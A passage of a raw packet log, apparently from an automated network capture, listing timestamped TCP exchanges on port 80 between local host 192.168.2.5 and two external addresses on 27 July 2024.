                                                        Jul 27, 2024 13:31:01.279406071 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.279422998 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.279438019 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.279472113 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.279489040 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.279504061 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.279537916 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.279555082 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.279571056 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.279603004 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.279622078 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.279635906 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.279669046 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.279685974 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.279702902 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.279736996 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.279752016 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.295718908 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.295809984 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.295937061 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.295986891 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.296020985 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.296045065 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.296055079 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.296087980 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.296102047 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.296122074 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.296180010 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.343332052 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.343434095 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.343471050 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.343503952 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.343516111 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.343539000 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.343558073 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.343573093 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.343607903 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.343626976 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.343640089 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.343673944 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.343693972 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.343705893 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.343739986 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.343755960 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.343772888 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.343810081 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.343842983 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.343844891 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.343909979 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.346498966 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.346534014 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.346587896 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.346611023 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.346750021 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.346785069 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.346808910 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.346822977 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.346854925 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.346877098 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.346889019 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.346923113 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.346945047 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.346956015 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.346988916 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.347009897 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.347023964 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.347057104 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.347079039 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.347093105 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.347147942 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.367042065 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.367099047 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.367135048 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.367165089 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.367227077 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.367259979 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.367299080 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.367315054 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.367366076 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.367371082 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.367408037 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.367486954 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.367501974 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.367536068 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.367568016 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.367587090 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.367604017 CEST8049704198.46.176.133192.168.2.5
                                                        Jul 27, 2024 13:31:01.367674112 CEST4970480192.168.2.5198.46.176.133
                                                        Jul 27, 2024 13:31:01.660321951 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:01.665724993 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:01.665832996 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:01.665900946 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:01.671608925 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.168703079 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.168751955 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.168787003 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.168829918 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.168853045 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.168941975 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.168975115 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.169008017 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.169040918 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.169074059 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.169109106 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.169115067 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.169115067 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.169143915 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.169186115 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.175251961 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.175287962 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.175359011 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.180176973 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.226830959 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.261408091 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.261504889 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.261539936 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.261571884 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.261580944 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.261606932 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.261640072 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.261656046 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.261673927 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.261699915 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.261704922 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.261738062 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.261758089 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.261771917 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.261835098 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.262120962 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.262268066 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.262322903 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.262331963 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.262397051 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.262432098 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.262456894 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.262929916 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.262993097 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.263020992 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.263098001 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.263144016 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.263160944 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.263220072 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.263278961 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.267498016 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.267534018 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.267569065 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.267596006 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.316013098 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.316099882 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.365200996 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365243912 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365278006 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365309954 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365343094 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365395069 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365428925 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365425110 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.365462065 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365494013 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365498066 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.365525007 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365550041 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.365557909 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365580082 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.365590096 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365622044 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365655899 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365664959 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.365686893 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365711927 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.365721941 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.365772963 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.367892981 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.367925882 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.367958069 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.367990017 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.368067980 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368100882 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368127108 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.368133068 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368186951 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.368187904 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368237019 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368272066 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368303061 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.368303061 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368336916 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368357897 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.368367910 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368401051 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368427038 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.368432999 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368510008 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368515015 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.368558884 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368591070 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368618011 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.368623972 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368674994 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.368683100 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.369641066 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.369674921 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.369705915 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.369724989 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.369757891 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.369785070 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.369798899 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.369856119 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.369863033 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.369896889 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.369955063 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.370191097 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.370222092 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.370256901 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.370280027 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.411346912 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.411488056 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.411509991 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.411520004 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.411608934 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.452718973 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.452805996 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.452842951 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.452908039 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.453252077 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.453285933 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.453356028 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.453412056 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.453449011 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.453473091 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.453728914 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.453762054 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.453788996 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.453907967 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.453942060 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.453963041 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.454490900 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.454525948 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.454551935 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.454667091 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.454705954 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.454730988 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.455524921 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.455559015 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.455585003 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.455591917 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.455626011 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.455645084 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.455657959 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.455714941 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.456446886 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.456480026 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.456540108 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.456558943 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.456573009 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.456626892 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.457216024 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.457251072 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.457304955 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.457372904 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.457407951 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.457459927 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.458086967 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.458122015 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.458154917 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.458178043 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.458188057 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.458220959 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.458242893 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.458983898 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.459018946 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.459043980 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.459053040 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.459084988 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.459110975 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.459853888 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.459889889 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.459912062 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.459923029 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.459956884 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.459974051 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.459990025 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.460045099 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.460747004 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.460782051 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.460836887 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.460906982 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.460941076 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.460995913 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.461539030 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.461574078 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.461608887 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.461631060 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.461642981 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.461694002 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.516082048 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.516154051 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.516190052 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.516242027 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.516478062 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.516544104 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.516545057 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.545030117 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.545135975 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.545146942 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.545155048 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.545233011 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.545494080 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.545511007 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.545526981 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.545545101 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.545563936 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.545594931 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.546217918 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.546233892 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.546292067 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.546624899 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.546641111 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.546658039 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.546674013 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.546690941 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.546696901 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.546705008 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.546725035 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.546781063 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.547615051 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.547631025 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.547645092 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.547661066 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.547677040 CEST8049705104.168.45.34192.168.2.5
                                                        Jul 27, 2024 13:31:02.547678947 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.547729969 CEST4970580192.168.2.5104.168.45.34
                                                        Jul 27, 2024 13:31:02.548641920 CEST8049705104.168.45.34192.168.2.5
